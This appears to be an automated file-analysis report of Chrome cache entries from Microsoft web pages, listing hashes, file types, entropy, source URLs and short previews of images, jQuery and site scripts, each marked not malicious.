                                                                                                                      SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                      SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                      Malicious:false
                                                                                                                      URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                                                                      Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..

                                                                                                                      Chrome Cache Entry: 379

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 32x32, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):308
                                                                                                                      Entropy (8bit):7.1080290655651375
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:ck5Z+lUPuq5yIRVnVhRp6sAm5nnWpQLJffvsFvboYe/zfpKU:cxlUPukyIHn7X64nDLJ5Ye/zhKU
                                                                                                                      MD5:6B7A4ADE4D99086DA8E64F1E23F2F579
                                                                                                                      SHA1:4CF069F3C32BD6FE5CCCFB7ABDDF42D36DDCD547
                                                                                                                      SHA-256:1F98B878DA957BA2B2C06415F405EA23832CDF5A4DADD9C76648BF72F37822FB
                                                                                                                      SHA-512:90ED525AFEC742BD3F08D3BB8FEE45A93284C12E1B097F23BBA9C11E1AB388B261FA4515B25578B91A80AB0061B42916DA260F3F1F55356C24BF28972FD935AF
                                                                                                                      Malicious:false
                                                                                                                      Preview:RIFF,...WEBPVP8 ........* . .>Q..D#......8....N.q...x.(...yd.....w,...S\....~..e...^......h.=...]....\|....Qt.K.X...z...|~.....&....9.M...........;.gX...+.c=s}..~..\..G'. .$..D_....Z....<..S...TW..+....!S.i........~>&b............*.:"......wN.L..z9y"3:..A......k...P....2?>k0..'.P..O.e....P.b2...

                                                                                                                      Chrome Cache Entry: 380

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 32x32, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):308
                                                                                                                      Entropy (8bit):7.1080290655651375
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:ck5Z+lUPuq5yIRVnVhRp6sAm5nnWpQLJffvsFvboYe/zfpKU:cxlUPukyIHn7X64nDLJ5Ye/zhKU
                                                                                                                      MD5:6B7A4ADE4D99086DA8E64F1E23F2F579
                                                                                                                      SHA1:4CF069F3C32BD6FE5CCCFB7ABDDF42D36DDCD547
                                                                                                                      SHA-256:1F98B878DA957BA2B2C06415F405EA23832CDF5A4DADD9C76648BF72F37822FB
                                                                                                                      SHA-512:90ED525AFEC742BD3F08D3BB8FEE45A93284C12E1B097F23BBA9C11E1AB388B261FA4515B25578B91A80AB0061B42916DA260F3F1F55356C24BF28972FD935AF
                                                                                                                      Malicious:false
                                                                                                                      URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/facebook?scl=1
                                                                                                                      Preview:RIFF,...WEBPVP8 ........* . .>Q..D#......8....N.q...x.(...yd.....w,...S\....~..e...^......h.=...]....\|....Qt.K.X...z...|~.....&....9.M...........;.gX...+.c=s}..~..\..G'. .$..D_....Z....<..S...TW..+....!S.i........~>&b............*.:"......wN.L..z9y"3:..A......k...P....2?>k0..'.P..O.e....P.b2...

                                                                                                                      Chrome Cache Entry: 381

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):25084
                                                                                                                      Entropy (8bit):7.954629745011792
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:z4b+mWMn+0y7Pg/1ZG7QBkT1ptdZXWVTTaGOKPKb3BZE3SDL0Fkx1qEPNugrtRPI:E+5Mn34PglkT9XICcPKb3Bh0e5tQT
                                                                                                                      MD5:9AA997545CAD62F24960E39B773AE81C
                                                                                                                      SHA1:3EBF01E3B3630F127309F816F13FF86B94798E07
                                                                                                                      SHA-256:BC5E9528086858FD7BFF758A1B0AE0D559A9930E279ECDF4955572B6AD1E53EA
                                                                                                                      SHA-512:4B2572DEA6B5C777AF39359095D97EB8078B3B252D4A70191837BF5C641B860CD4AF56719B3D96E45CBEBB13465625FD5DD6E66BC03F009487FEBEAF5D9F7169
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/fbf6e41b-ddbe-43db-a616-7a8e48d43d18.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...a.IDATx..y..Eu...u}.@1.....D...IX..0,A..Fc.`.,.D..H .eUX.....E..X.H...1q......(....*l...r.!.....rz.....yf......9.{6z.......h....__......r.S.C..F...T.o...<.9.M..$].6.:...9..vSrN.B.2.Ug....x..rU6i>zY..C.lK.._.v.H.......9.S..U.]T.v..Y8..LJ...tl.C....m(...&.(QpAP.x\".._.G..$.L..)T[.."j$...}...@>z.n-..X.U..45&.S*.....N.m\...m"I"...\.q.|M.6#.............Q....."*...e..m.6..f.....Sj...cK+DH...+]..".......i..Q.......xS.24@....C".$b*.]'Y...<J.$.jY7J........i..0..1..........y./)Db.@_@.m.X|..u..f..w..C@.\{.mc..u&....5k..`.j.ZO7.L...7.....R..zxp...B...Y..*..&!#..v...m[.\|!}....B%-..K!U..cjj..Z...^...(.J....LHYK.'.@r.....*d[..Q>..[VJ..b...H5H-....h.9..K.;.1..#.)fy.........r..B.X.L.)..PV$=..:.6!.B..Z.|...).....%@..IK.G....'ci....(.-.......R.....5W..]..4.......2[..m...9..g...w.....p.4t..... ..(.je...r..R....{E.y.Xhr..U.>.H....5}.,Q.4S.$..I...R..` ....=R.#.-Y.}l......U.W...

                                                                                                                      Chrome Cache Entry: 382

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (352), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):352
                                                                                                                      Entropy (8bit):5.097997927435311
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:Q37FejK1hPCuLNKKCdTtyg4LKLnawvStEYl4BXWe/8hdsGg9ZPYgyg4L/:c7Mj+h6uh30tyg4LKGsSEvophufdYgyf
                                                                                                                      MD5:46469E1FACB74FFD90D181244E48558C
                                                                                                                      SHA1:74003A1FCBF4178C5F6F275D68468B2B765AFBE0
                                                                                                                      SHA-256:F83D4C9FC55AB64D61D29878A7B7722D331E1FD476429736FE8AFE156D44F970
                                                                                                                      SHA-512:8A21A9A850EE9CAF39CEFE2BD492A1721C2A69EA85BE476982BE0E24FFC6B6DB135EDAB5302A75FAAF2C55DDC0ABB21FAA34EC38230F19C10A7A70574D6871C3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/tablecomponent/v1/tablecomponent/clientlibs/site.min.ACSHASH46469e1facb74ffd90d181244e48558c.js
                                                                                                                      Preview:'use strict';$(function(){$(".table-container table th,td").html(function(a,b){return b.replace(/&nbsp;/g," ")})});function addFootnotesTableComponentV1(){document.querySelectorAll(".table sup").forEach(a=>{0==a.children.length&&a.insertAdjacentHTML("afterbegin",'\x3cspan class\x3d"sr-text"\x3eFootnote\x3c/span\x3e')})}addFootnotesTableComponentV1();

                                                                                                                      Chrome Cache Entry: 383

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):159
                                                                                                                      Entropy (8bit):4.661188988961239
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:agWqLss4aXD5R20gJYRnd7HtOx1L5HQhLIzseX5LxfYLk21:QqPXD5bDRd7H8L5whLzeJSI21
                                                                                                                      MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                                                                      SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                                                                      SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                                                                      SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};

                                                                                                                      Chrome Cache Entry: 384

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (889)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):92962
                                                                                                                      Entropy (8bit):5.482012211093105
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:wB4vGoYlmQr+IDv1Ty/6RsSz5TGF/46nNUgDbC03vu9FnHKDfa6Z/VUhdIKq6Tjv:wqxNrNG9FnHKD/oIKq6Tjv
                                                                                                                      MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                      SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                      SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                      SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]

                                                                                                                      Chrome Cache Entry: 385

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):17028
                                                                                                                      Entropy (8bit):7.926562320564401
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:7wixC+iG9rj5+kgbLPcAmxOkpJIhI9CvaMo05vCf9MRRLMk5K/jk:sifiG2tvXmxHbIhlo05KlGRaY
                                                                                                                      MD5:DDCB4FCA39CCADCDF6C1FE2E1F717867
                                                                                                                      SHA1:88238D53920F32AF37A802A5E6BFEEC3B1E6F75D
                                                                                                                      SHA-256:097DF2DFA3781F1AEDB631C968D04D8152D7C7FA8E92BC91E233B3000E2F34BB
                                                                                                                      SHA-512:316574E565EF67B97E13D0BF01CF4AFA8E0E9CF0748768CE4AE6BBB81352685A6E027EADBC083D2B632C412C950E65963E6EA98FE4CE7692C0AE0B6D956D3D37
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...B.IDATx..Y.mWU.W.7.A.e.Z..H.R.F.......$!....iH..4...T@..{i.A.....M..... .XP6eaB..R% ...Bs.o.0N..w...Zkvk..j.>g.}.^...c.1O...?..K.I'..J..<.c..fX!..N.m5...!.O-.=....p/....B.m_..o..........7.{..............]..~...C.....J..g..*bI.C.....@&.7.}...u.RYs.J_.P_..j.....J...%..}.{..)}o,....|...2iil+1.n:.W.b.I@. ......q/........},...K.....b.35f.....@t.C.H..f.....X8...qXA5W\m*G..78..E.Wjm..j.C.E.....L.!e...}..... .FKi......!........t.;.s:8.P....9...H@....I! ...lp....`...".#.... .d"......=eN.nNcMUu......=.l......a.@...KY...^.....D..........=..<%&..}...P.HK.CE...0...R1..r..#h.5...)....z.B.....7.DH....KE...ha)....Z.=........)b*ZH.X.._...)........HK.a.Pn.X1Eh.....o.B......k...2....`..v.O.=...]..Y.!..:R.:......G*@jg.q.[b.....)].O.....jm...q.c..*...=B...|.........%....x.Bc..[.....r.....4......R.}......R...6.I..W..!...8K...:..U.. .3ZH...t.e..f\.(...y>k+.AH"..K.GjI!....J.}...HK..&..%.

                                                                                                                      Chrome Cache Entry: 386

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4565
                                                                                                                      Entropy (8bit):7.879534543139402
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                      MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                      SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                      SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                      SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..

                                                                                                                      Chrome Cache Entry: 387

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text, with very long lines (1575)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):169884
                                                                                                                      Entropy (8bit):4.99876151266667
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:WiUfu27gZraC5d1+ZcejRw/Fwuwx6xQ2+7rkTerQPmZl04:WiUfu27gZOEdQV6tw3x6xQ2irkSr5lZ
                                                                                                                      MD5:EDFEC65E7C5DD0274A9FB76B6693B08A
                                                                                                                      SHA1:AAF388949CD18C00003E48618BD64E42AD8AE9CC
                                                                                                                      SHA-256:955624BC314CCE5ACBB061D08C3E532C8CBEC7C117A116842B059A60D39FF5F4
                                                                                                                      SHA-512:AF3ED5B827189EB0C6CD837F821883F20464F07CDA8629530FA4AC09457A8AB2E0CAB4AACBC2EBED03704309E3034F8F2600AB8FF04D1DF2E27EB38B7A1CA14E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/en-us/windows/windows-10-specifications
                                                                                                                      Preview:<!DOCTYPE HTML>..<html lang="en-US" dir="ltr">.<head>. . .. ..... . . . . . . . .. . Start of ADDITIONAL DEBUG INFO ** cv.html **.. CVToken: CASMicrosoftCV4cd5dd74.0. End of ADDITIONAL DEBUG INFO -->.... . . . . . <meta charset="UTF-8"/>. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/>. <meta http-equiv="x-ua-compatible" content="ie=edge"/>. . <meta name="keywords" content="Windows 10 requirements,windows 10 specifications,windows 10 system requirements,windows deprecations" />. . <meta name="twitter:site" content="@windows" />. . <meta name="twitter:creator" content="@microsoft" />. . <meta name="ms.lang" content="en" />. . <meta

                                                                                                                      Chrome Cache Entry: 388

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2832
                                                                                                                      Entropy (8bit):7.92569260000134
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:5vgIfLwwvMw0oRW3lJOef6SE771axbtO4SSlPuVmcW3lIMJUCfVA2WNwfUFzzrPL:mIfL7v0oRWHOUEn1aH/Ll5h3KMJUcjWN
                                                                                                                      MD5:9F25C34D443324665BB679F0C9716FF0
                                                                                                                      SHA1:6224748E3C5968F23CF4717A3FFDB797A609DBAA
                                                                                                                      SHA-256:65CBC7C735A938DCD2F8C5F74090229DF93E974613E757B0920F63DAEF5E2989
                                                                                                                      SHA-512:BCAC42EBEE72C4443E7BCAAF10F94A02F17F0B2E7560EF766A41B808FD9E5BDA55871C92001C6A04B39CF0EF46958A0DE6DC981D8A8B5E3170E32230A7233FF4
                                                                                                                      Malicious:false
                                                                                                                      Preview:RIFF....WEBPVP8 .....'...*d.d....%..W..9.%.+.O....O....W.S.....#.........px.~......W.....9.@.....g.....'.N.../.......f....@......B...g..........{;.o.........~..........g........`~.{.~.|.....Rl.;w..T. ..nk6..P........=./.JZo...%..n..>q.,.6..z..oq...u62......A.J<.mC.zvJ,..#..?....M.......:.S..d.1..W...[...S..G......b...%...@.E..C.9..........f....}n..L......0I./B].1..q... ....-..U.....b.hZ..zL.M.m..m.\.3y..n.1(..V.C#..I....'..{3....QZ..........2O....y...|.....^.e.l...0.*......c...=.?~2.n8.e}#+..|....4...h..d..m..".....v<..j.@M.Y.?'.=s...w.0T.mv.....Y...?....{.y......~.v.g......./.'.p.nA.k2..]..e..*?cF..]...n..@._....SI.....l......X.L..N6.q....M.Q..U.s..6S..q..!.P.g.7.Nu.3.Av....luT.............]6..;c!.D."W..C9....B.p.......n>..y...s..@F.g..]rN]o..'..I...0.U...Ibv.J..........<0.N......g#.A].....>.>^......{.!2I...V.He.*...A.....U_qf..59.T...1.?..4f...`l.dl.....G.|^........:..c...".. ....?......u.?.-...8zw..^Yc....y.7r[.&.;].{....,.H....M.._

                                                                                                                      Chrome Cache Entry: 389

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):32
                                                                                                                      Entropy (8bit):4.327819531114783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Aq7KKlMT9:AqeKWT9
                                                                                                                      MD5:A8A3710424DC6E0DFF393C6964441BDB
                                                                                                                      SHA1:E4978066791DD394BDDD174F2687A7CDD43442B2
                                                                                                                      SHA-256:46CD047CC0D3D10776E2F50D4C9D55DB58BD97D7A95B7D691F53D4937C71CF00
                                                                                                                      SHA-512:EE135EE50868E59853C8FE57A9471AE1FBBDE30A929D33B4A4D56200E70C93AFDFF0301EF7FEBC803258C2BA2DCBC183E632B2ADA1745D3C87C1EEB98E8DEE62
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASHa8a3710424dc6e0dff393c6964441bdb.css
                                                                                                                      Preview:[class*="z-"]{position:relative}

                                                                                                                      Chrome Cache Entry: 390

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (507)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1570
                                                                                                                      Entropy (8bit):4.964227241339809
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:3jp9cCfqk3rG/OcXBFBStOcf5W6UMyKyV/8RR5Lh/NgQQRWVvEwMvghoQ2aM0/vD:3jhlzcjbchWGyd58lRQweHQ24glA+J1k
                                                                                                                      MD5:799F7DC6C3727B83CEC920A004E6B985
                                                                                                                      SHA1:8E24FEC9E4F64001BBA989029FFC3E9C7C703820
                                                                                                                      SHA-256:1CAFEC3DDD8B49D61D8A6206D3D7ABBE4833DA0AD852CA3295DAF137242AC1D3
                                                                                                                      SHA-512:4834456FF369DF119CCE262439E64F4E7D9542FACB32615B0D4998FF1083EB9ADCCFB3D1D62F09BAD8F35482914B265D0149F7FDB921C1718DE19CD595F79765
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/components/content/stickybanner/v1/stickybanner/clientlibs/site.min.ACSHASH799f7dc6c3727b83cec920a004e6b985.js
                                                                                                                      Preview:'use strict';const closeButtonStickyBanner=document.querySelector(".sticky-banner-close"),stickyBannerElement=document.querySelector(".sticky-banner"),chatBotInSticky=document.querySelector(".chat-bot");.stickyBannerElement&&(closeButtonStickyBanner&&(closeButtonStickyBanner.addEventListener("click",function(){hideStickyBanner();const a=document.querySelector(".click-start");a&&a.classList.remove("d-none")}),closeButtonStickyBanner.addEventListener("keydown",handleKeyDown)),onScrollHideBanner,window.addEventListener("scroll",onScrollHideBanner),window.addEventListener("resize",()=>{setTimeout(()=>onScrollHideBanner(),600)}));.function onScrollHideBanner(){var a=document.getElementById("uhf-footer");let c=document.querySelector(".closebtnclicked");var b=stickyBannerElement.offsetHeight;document.querySelector(".fixed-back-to-top").style.bottom=b+"px";if(a){b=document.getElementsByClassName("sticky-banner-hide");a=a.getBoundingClientRect();var d=window.innerHeight;c||(a.top<=d&&0<=a.botto

                                                                                                                      Chrome Cache Entry: 391

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3164)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34401
                                                                                                                      Entropy (8bit):5.567515913811421
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:xluaIaJW9ePBW/YfKbNckc0OFc0hLoSIbSZdfKGnRmSdgSJnsYXZeTnOki:XuioyA/7c0opLozb6RmCg6kTG
                                                                                                                      MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                      SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                      SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                      SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+

                                                                                                                      Chrome Cache Entry: 392

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1290)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11629
                                                                                                                      Entropy (8bit):5.449562181288923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:D+BJaYpdowNJ0EwWnvUaBBVaJxQvqKTAphPgffazesLZEU1bsLM7vImzwXdrQ9Cr:D+DDdowNJ0EwWnvUaBBVaJxQvqKTAphS
                                                                                                                      MD5:BB93CF674BEB54673814249DCF4EFC96
                                                                                                                      SHA1:3190F4BE4D37525C6B3222B93EEAFBC66B538E94
                                                                                                                      SHA-256:9653EB19E7206B44513D92E4C9359B289FC2478D4611AE01C5798C89C8211E70
                                                                                                                      SHA-512:D7E09140CF399BDEB513544617FABD95AB62BE0D9DD265B2A9E5EB5D1DC29497FE5A4088E66A00C4AEBB9529A217354EBEF512E504B22245CF8C12DC3D95B449
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';var currentLocale=$("html").attr("lang").toLowerCase(),currentPage=window.location.pathname.toLowerCase(),targetPage="/en-us/windows/business/windows-11-pro",enableExperiments=document.querySelector("meta[name*\x3d'enabled-experiment']"),enableExperimentsValue=void 0!=enableExperiments&&null!=enableExperiments?enableExperiments.content:"",DB_AUDIENCES="Software \x26 Technology;Business Services;Telecommunications;University;Financial Services;Manufacturing;Education;Construction;Healthcare \x26 Medical;K12".split(";"),.win_personalization={"en-us":{alt:{"Software \x26 Technology":"A man working at a standing desk surrounded by three monitors with coding information on screens.","Business Services":"A conference room with Microsoft Teams on monitor and several people around a table with laptop open, working on schematic.",Telecommunications:"A single telecommunications tower rising amongst a sunset and mountains.",University:"Several college-age students with laptops open,

                                                                                                                      Chrome Cache Entry: 393

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (728)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11405
                                                                                                                      Entropy (8bit):5.337832455968521
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ei4mI8A10VNEHbnIB89tGRbvlG/bUgck7L8Dap8z+vRjQfymrQy1Zy1Gy1M+qmWW:eiy1F7nIB89tGRbvaUBvk8qjQfymrQy8
                                                                                                                      MD5:FF9CACB22668C4F6174E0AF4A2BE89F9
                                                                                                                      SHA1:EC9ED15001A3E13404660B6EA09F99C512E08882
                                                                                                                      SHA-256:EF39A5CC6826231852FD8D60736867DA31E7E9036F3575B1DC4846DC6FB86A3B
                                                                                                                      SHA-512:267064DCB16AB4B9B19756C2313CCB9E5B467A41427DE9BF46158A1C2231699EC43D51C2F201D97C02AFA31BF5011FF471035CF10C7DC6003299B86D85C52806
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-site.min.ACSHASHff9cacb22668c4f6174e0af4a2be89f9.js
